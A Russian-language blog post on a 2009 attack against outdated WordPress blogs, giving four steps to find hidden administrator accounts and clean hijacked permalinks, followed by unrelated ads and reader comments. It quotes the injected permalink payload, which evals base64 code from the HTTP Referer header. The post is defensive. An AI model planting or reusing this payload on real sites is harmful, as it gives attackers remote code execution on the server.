Атака на блоги WordPress

06 Сен
09
Настройки безопасность58, обновления13

1159 4

Вчера произошла атака на блоги WordPress старых версий. Я узнал об этом от знакомого, который обратился ко мне, описав ситуацию — не работают ссылки на страницы. Обобщив информацию, я получил такую картину:

  1. атаке подверглись блоги с WordPress ниже 2.8.4
  2. после атаки к прямой ссылке на посты добавилась приставка
    1
    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
  3. среди администраторов блога появились совершенно «левые», хотя напрямую это не видно

Вылечить свой блог можно за четыре шага:

1. Зайдите в панель администрирования, в раздел пользователей. Найдите среди них последнего зарегистрировавшегося.

2. У этого пользователя скопируйте ссылку, которая скрывается под пунктом «Редактирование/Изменить/Edit» и вставьте ее в браузер.

3. Увеличьте номер пользователя на единицу и зайдите на страницу редактирования профиля — откроется профиль скрытого администратора, у которого вместо имени какой-то код. Удалите имя и сохраните — профиль появится среди обычных пользователей. После этого можете его удалять обычным способом.

4. Зайдите в настройки постоянных ссылок (Параметры → Постоянные ссылки) и удалите код, который был добавлен к виде ваших ссылок.

Скриншоты привести не могу, так как мои блоги не подверглись этой атаке (или успешно от нее отбились). А теперь главный вопрос: почему вы не обновляетесь вовремя? Чтобы делать это автоматически, прочитайте пост Автоматическое обновление WordPress.

Профессиональное обслуживание, монтаж и проектирование корпоративных сетей, телефонных сетей, охранно-пожарных сигнализаций, электросетей, волоконно-оптических линий и других локальных телекоммуникационных систем. Звоните прямо сейчас — телефон по ссылке!

Компания продает красивый, прочный и дешевый керамогранит оптом со склада в Москве. Не тормозим — подъезжаем и загружаемся!

Чтобы парни все замялись, а девчонки наклонялись, авто тюнинг своей тачке нужно делать вам, ребята!

Еще Настройки
47  
07 Фев
12
Как удалить ненужные виджеты из административной панели
104  
27 Янв
12
Как добавить к посту класс, если есть миниатюра поста
106  
27 Янв
12
Как сделать, чтобы админка была с одним языком, а блог с другим
106  
27 Янв
12
Как автоматически подстраивать видео Vimeo под ширину блога
Похожие записи
201 2
09 Янв
12
Как установить полный контроль за входом в блог – Login Lock
339 7
15 Дек
11
WordPress 3.3 – новые возможности
328 2
18 Ноя
11
Плагин Members (ограничение доступа к сайту)
744 4
03 Авг
11
Уязвимость в timthumb.php
Записей 1741
Являюсь создателем и идейным вдохновителем n-wp.ru. Блог посвящен WordPress - плагины, темы, тонкости настроек, вспомогательные сервисы и программы. Приоритетными являются публикации для новичков. Любой в блоге может задать вопрос и разместить свой материал. Мне интересно многое, поэтому так же веду блог о программах для Windows, практичный и красивый блог о handmade, стильный фото/видео блог о красоте и личный блог.
Комментариев 4

  1. Да, атака была. Но вот левых пользователей с админ правами я не видел. Так как у меня зарегистрированные пользователи практически все- авторы спам комментариев то тупо удалил всех. Поправил ЧПУ и обновил блог. :) Жаль, что скриншотов не сделал я :( не догадался…

  2. Последний зарегистрировавшийся есть? Нужно проверить его, как описано выше. Потому что скрытого администратора не видно обычным путем.

  3. Был :) я ж говорю- я всех подчистую убрал. Ни одного комментария от зарегистрированных, кроме тебя (да и то месяц назад наверное ;)) И Индигоблэка не было. Только спамили почти все. Удалил. Но у всех прописаны права "пользователь" были. Я смотрел.. Я думаю может все-таки права на htacces виной?

  4. Спасибо огромное за методику. Обнаружил у себя 10 (!!!!!) скрытых юзеров-админов… заметил неделью назад, что ЧПУ выдает какую-то хрень… пошел все поправил руками, через день – снова хрень… а сегодня прочитал про эту напасть и сразу понял, что это про меня… Спасибо еще раз.